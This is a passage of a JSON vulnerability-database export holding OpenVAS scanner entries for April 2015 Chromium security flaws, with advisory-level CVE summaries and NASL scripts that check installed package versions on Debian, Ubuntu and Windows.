studies.\n\nCVE-2015-3333\nMultiple issues were discovered and fixed in v8 4.2.7.14.\n\nCVE-2015-3334\nIt was discovered that remote websites could capture video data from\nattached web cameras without permission.\n\nCVE-2015-3336\nIt was discovered that remote websites could cause user interface\ndisruptions like window fullscreening and mouse pointer locking.", "cvss3": {}, "published": "2015-04-26T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3238-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-3336", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703238", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3238.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3238-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703238\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\",\n \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\",\n \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\",\n \"CVE-2015-1249\", \"CVE-2015-3333\", \"CVE-2015-3334\", \"CVE-2015-3336\");\n script_name(\"Debian Security Advisory DSA 3238-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-26 00:00:00 +0200 (Sun, 26 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3238.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.90-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 42.0.2311.90-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1235\nA Same Origin Policy bypass issue was discovered in the HTML\nparser.\n\nCVE-2015-1236\nAmitay Dobo discovered a Same Origin Policy bypass in the Web Audio\nAPI.\n\nCVE-2015-1237\nKhalil Zhani discovered a use-after-free issue in IPC.\n\nCVE-2015-1238cloudfuzzer\ndiscovered an out-of-bounds write in the skia\nlibrary.\n\nCVE-2015-1240w3bd3vil\ndiscovered an out-of-bounds read in the WebGL\nimplementation.\n\nCVE-2015-1241\nPhillip Moon and Matt Weston discovered a way to trigger local user\ninterface actions remotely via a crafted website.\n\nCVE-2015-1242\nA type confusion issue was discovered in the v8 javascript\nlibrary.\n\nCVE-2015-1244\nMike Ruddy discovered a way to bypass the HTTP Strict Transport Security\npolicy.\n\nCVE-2015-1245\nKhalil Zhani discovered a use-after-free issue in the pdfium\nlibrary.\n\nCVE-2015-1246\nAtte Kettunen discovered an out-of-bounds read issue in\nwebkit/blink.\n\nCVE-2015-1247Jann Horn discovered that file:\nURLs in OpenSearch documents were not\nsanitized, which could allow local files to be read remotely when using\nthe OpenSearch feature from a crafted website.\n\nCVE-2015-1248\nVittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\nwhich could allow the remote execution of a downloaded executable\nfile.\n\nCVE-2015-1249\nThe chrome 41 development team found various issues from internal\nfuzzing, audits, and other studies.\n\nCVE-2015-3333\nMultiple issues were discovered and fixed in v8 4.2.7.14.\n\nCVE-2015-3334\nIt was discovered that remote websites could capture video data from\nattached web cameras without permission.\n\nCVE-2015-3336\nIt was discovered that remote websites could cause user interface\ndisruptions like window fullscreening and mouse pointer locking.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"42.0.2311.90-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"42.0.2311.90-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"42.0.2311.90-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"42.0.2311.90-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"42.0.2311.90-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"42.0.2311.90-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"42.0.2311.90-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"42.0.2311.90-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"42.0.2311.90-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:54:03", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1235 \nA Same Origin Policy bypass issue was discovered in the HTML\nparser.\n\nCVE-2015-1236 \nAmitay Dobo discovered a Same Origin Policy bypass in the Web Audio\nAPI.\n\nCVE-2015-1237 \nKhalil Zhani discovered a use-after-free issue in IPC.\n\nCVE-2015-1238cloudfuzzer \ndiscovered an out-of-bounds write in the skia\nlibrary.\n\nCVE-2015-1240w3bd3vil \ndiscovered an out-of-bounds read in the WebGL\nimplementation.\n\nCVE-2015-1241 \nPhillip Moon and Matt Weston discovered a way to trigger local user\ninterface actions remotely via a crafted website.\n\nCVE-2015-1242 \nA type confusion issue was discovered in the v8 javascript\nlibrary.\n\nCVE-2015-1244 \nMike Ruddy discovered a way to bypass the HTTP Strict Transport Security\npolicy.\n\nCVE-2015-1245 \nKhalil Zhani discovered a use-after-free issue in the pdfium\nlibrary.\n\nCVE-2015-1246 \nAtte Kettunen discovered an out-of-bounds read issue in\nwebkit/blink.\n\nCVE-2015-1247Jann Horn discovered that file: \nURLs in OpenSearch documents were not\nsanitized, which could allow local files to be read remotely when using\nthe OpenSearch feature from a crafted website.\n\nCVE-2015-1248 \nVittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\nwhich could allow the remote execution of a downloaded executable\nfile.\n\nCVE-2015-1249 \nThe chrome 41 development team found various issues from internal\nfuzzing, audits, and other studies.\n\nCVE-2015-3333 \nMultiple issues were discovered and fixed in v8 4.2.7.14.\n\nCVE-2015-3334 \nIt was discovered that remote websites could capture video data from\nattached web cameras without permission.\n\nCVE-2015-3336 \nIt was discovered that remote websites could cause user interface\ndisruptions like window fullscreening and mouse pointer locking.", "cvss3": {}, "published": "2015-04-26T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3238-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-3336", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703238", "href": "http://plugins.openvas.org/nasl.php?oid=703238", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3238.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3238-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703238);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\",\n \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\",\n \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\",\n \"CVE-2015-1249\", \"CVE-2015-3333\", \"CVE-2015-3334\", \"CVE-2015-3336\");\n script_name(\"Debian Security Advisory DSA 3238-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-04-26 00:00:00 +0200 (Sun, 26 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3238.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.90-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 42.0.2311.90-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1235 \nA Same Origin Policy bypass issue was discovered in the HTML\nparser.\n\nCVE-2015-1236 \nAmitay Dobo discovered a Same Origin Policy bypass in the Web Audio\nAPI.\n\nCVE-2015-1237 \nKhalil Zhani discovered a use-after-free issue in IPC.\n\nCVE-2015-1238cloudfuzzer \ndiscovered an out-of-bounds write in the skia\nlibrary.\n\nCVE-2015-1240w3bd3vil \ndiscovered an out-of-bounds read in the WebGL\nimplementation.\n\nCVE-2015-1241 \nPhillip Moon and Matt Weston discovered a way to trigger local user\ninterface actions remotely via a crafted website.\n\nCVE-2015-1242 \nA type confusion issue was discovered in the v8 javascript\nlibrary.\n\nCVE-2015-1244 \nMike Ruddy discovered a way to bypass the HTTP Strict Transport Security\npolicy.\n\nCVE-2015-1245 \nKhalil Zhani discovered a use-after-free issue in the pdfium\nlibrary.\n\nCVE-2015-1246 \nAtte Kettunen discovered an out-of-bounds read issue in\nwebkit/blink.\n\nCVE-2015-1247Jann Horn discovered that file: \nURLs in OpenSearch documents were not\nsanitized, which could allow local files to be read remotely when using\nthe OpenSearch feature from a crafted website.\n\nCVE-2015-1248 \nVittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\nwhich could allow the remote execution of a downloaded executable\nfile.\n\nCVE-2015-1249 \nThe chrome 41 development team found various issues from internal\nfuzzing, audits, and other studies.\n\nCVE-2015-3333 \nMultiple issues were discovered and fixed in v8 4.2.7.14.\n\nCVE-2015-3334 \nIt was discovered that remote websites could capture video data from\nattached web cameras without permission.\n\nCVE-2015-3336 \nIt was discovered that remote websites could cause user interface\ndisruptions like window fullscreening and mouse pointer locking.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"42.0.2311.90-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"42.0.2311.90-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"42.0.2311.90-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"42.0.2311.90-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"42.0.2311.90-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"42.0.2311.90-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"42.0.2311.90-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"42.0.2311.90-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"42.0.2311.90-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-04-28T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2570-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1321", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842181", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842181", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-2570-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842181\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-28 05:17:12 +0200 (Tue, 28 Apr 2015)\");\n script_cve_id(\"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\",\n \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1244\",\n \"CVE-2015-1246\", \"CVE-2015-1249\", \"CVE-2015-1321\", \"CVE-2015-3333\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-2570-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"An issue was discovered in the HTML parser\nin Blink. If a user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1235)\n\nAn issue was discovered in the Web Audio API implementation in Blink. If\na user were tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1236)\n\nA use-after-free was discovered in Chromium. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer crash, or execute arbitrary\ncode with the privileges of the sandboxed render process. (CVE-2015-1237)\n\nAn out-of-bounds write was discovered in Skia. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via application crash or execute\narbitrary code with the privileges of the user invoking the program.\n(CVE-2015-1238)\n\nAn out-of-bounds read was discovered in the WebGL implementation. If a\nuser were tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2015-1240)\n\nAn issue was discovered with the interaction of page navigation and touch\nevent handling. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to conduct\n'tap jacking' attacks. (CVE-2015-1241)\n\nA type confusion bug was discovered in V8. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer crash, or execute arbitrary\ncode with the privileges of the sandboxed render process. (CVE-2015-1242)\n\nIt was discovered that websocket connections were not upgraded whenever a\nHSTS policy is active. A remote attacker could potentially exploit this\nto conduct a man in the middle (MITM) attack. (CVE-2015-1244)\n\nAn out-of-bounds read was discovered in Blink. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash.\n(CVE-2015-1246)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1249)\n\nA use-aft ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2570-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2570-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.6.5-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.6.5-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.6.5-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.6.5-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.6.5-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.6.5-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.6.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.6.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.6.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.6.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.6.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.6.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:36", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-02 Apr15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-3335", "CVE-2015-3336", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805457", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805457", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-02 Apr15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805457\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-3335\", \"CVE-2015-3334\", \"CVE-2015-3333\", \"CVE-2015-1249\",\n \"CVE-2015-1247\", \"CVE-2015-1246\", \"CVE-2015-1244\", \"CVE-2015-1242\",\n \"CVE-2015-1241\", \"CVE-2015-1240\", \"CVE-2015-1238\", \"CVE-2015-1237\",\n \"CVE-2015-1236\", \"CVE-2015-1235\", \"CVE-2015-3336\");\n script_bugtraq_id(72715, 74227, 74225, 74221);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-21 18:18:54 +0530 (Tue, 21 Apr 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-02 Apr15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Missing address space usage limitation in the NaCl process.\n\n - Permissions for camera and microphone are merged into a single 'Media'\n permission instead of treated as two separate permission.\n\n - Flaw in the 'SearchEngineTabHelper::OnPageHasOSDD' function in\n ui/search_engines/search_engine_tab_helper.cc script that is triggered when\n handling URLs for OpenSearch descriptor.\n\n - An unspecified out-of-bounds read flaw in Blink.\n\n - A flaw related to WebSocket connections as HSTS\n (HTTP Strict Transport Security) is not enforced.\n\n - A type confusion flaw in the 'ReduceTransitionElementsKind' function in\n hydrogen-check-elimination.cc script related to HTransitionElementsKind\n handling.\n\n - A Tap-Jacking flaw that is triggered as certain synthetic Tap events aren't\n preceded by TapDown events.\n\n - An unspecified out-of-bounds read flaw in WebGL related to handling of ES3\n commands.\n\n - An unspecified out-of-bounds write flaw in Skia.\n\n - A use-after-free error in content/renderer/render_frame_impl.cc script.\n\n - A flaw in the 'MediaElementAudioSourceNode::process' function in\n modules/webaudio/MediaElementAudioSourceNode.cpp script.\n\n - An unspecified flaw in the HTML Parser.\n\n - Multiple unspecified Vulnerabilities\n\n - Browser does not confirm with the user before setting\n CONTENT_SETTINGS_TYPE_FULLSCREEN and CONTENT_SETTINGS_TYPE_MOUSELOCK.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security restrictions, conduct row-hammer attacks,\n obtain sensitive data, trigger unintended UI actions via crafted dimension,\n cause a denial of service and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 42.0.2311.90 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 42.0.2311.90 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.com/2015/04/stable-channel-update_14.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n 